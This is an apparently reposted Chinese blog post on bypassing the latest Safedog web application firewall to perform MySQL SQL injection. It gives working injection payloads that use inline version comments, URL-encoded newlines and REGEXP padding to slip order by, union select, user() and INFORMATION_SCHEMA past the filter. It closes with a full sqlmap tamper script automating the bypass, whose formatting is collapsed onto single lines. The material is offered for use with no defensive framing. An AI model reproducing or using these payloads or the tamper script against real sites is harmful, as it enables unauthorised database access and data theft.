【网络安全】SQL注入bypass最新版安全狗
生活随笔
收集整理的這篇文章主要介紹了
【网络安全】SQL注入bypass最新版安全狗
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
前言
安全狗又偷偷摸摸更新了
【網絡安全學習】
繞過
之前安全狗就像沒開發完一樣,簡單內聯就過去了,但是現在的安全狗搖身一變,變得穩重了起來。
就連報錯界面都變成了大人的模樣。
看這架勢,不好過啊
首先 and 內斂注釋依舊是可以過的,看來安全狗并沒有太過關注and,可能是覺得后面的規則比較牛,知道有注入也沒用?
然后是order by ,從這里開始,事情就變得微妙了起來
猜測規則是order by 組合強規則,意思就是order by中間無論加什么都過不去
隨便試一試
果然,但是有沒有發現,我fuzz的符號里沒有加#號,因為加了就會這樣
由于錨點這個特殊性,盲猜這是一個突破點
可能安全狗遇到注釋也會直接截斷掉后面的語句(類似某鎖),那就好說了,構造個注釋在語句前面即可
居然沒過,小看你了安全狗,看來order by規則還沒失效,那么 嘗試隔斷order by
中間加個%0a
輕輕松松
接下來是union select 組合
同理,也可以這樣過
1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+
下一個是user()這類函數,這里也是個坑,發現直接括號會被攔
去一個右括號就沒事了,這規則也是無語
既然如此,在括號里下文章即可
依然是換行加注釋繞過
-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +
然后是INFORMATION_SCHEMA 這玩意,居然也被加到了規則里,
沒關系,繼續構造換行注釋,
tamper
#!/usr/bin/env python # -*- coding: utf-8 -*-""" Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26) See the file 'LICENSE' for copying permission Author:pureqh.top """import re import osfrom lib.core.data import kb from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS __priority__ = PRIORITY.LOWdef dependencies():singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))def tamper(payload, **kwargs):payload=payload.replace(" "," ",1)payload=payload.replace("ORDER BY","REGEXP "[...%25%23]" /*!11444order %0a by*/")payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")payload=payload.replace(" AND","/*!11444AND*/")payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")payload=payload.replace("UNION SELECT","/*!11444union*/ /*REGEXP "[...%25%23]"*/ %0a select /*REGEXP "[...%25%23]"*/")payload=payload.replace("UNION ALL SELECT","REGEXP "[...%0a%23]" /*!11444union %0a select */ ")payload=payload.replace("()","(%0a /*!80000aaa*/)")payload=payload.replace(" AS","/*!11444AS*/")payload=payload.replace("FROM","/*!11444FROM*/")payload=payload.replace("INFORMATION_SCHEMA","/*like"%0a%23"*/ %0a INFORMATION_SCHEMA")payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")return payload題外話 某鎖也能這樣過
點擊【網絡安全學習資料·攻略】查看
總結
以上是生活随笔為你收集整理的【网络安全】SQL注入bypass最新版安全狗的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【内网渗透工具】炫彩蛇安装教程
- 下一篇: 深入分析H2数据库控制台中无需身份验证的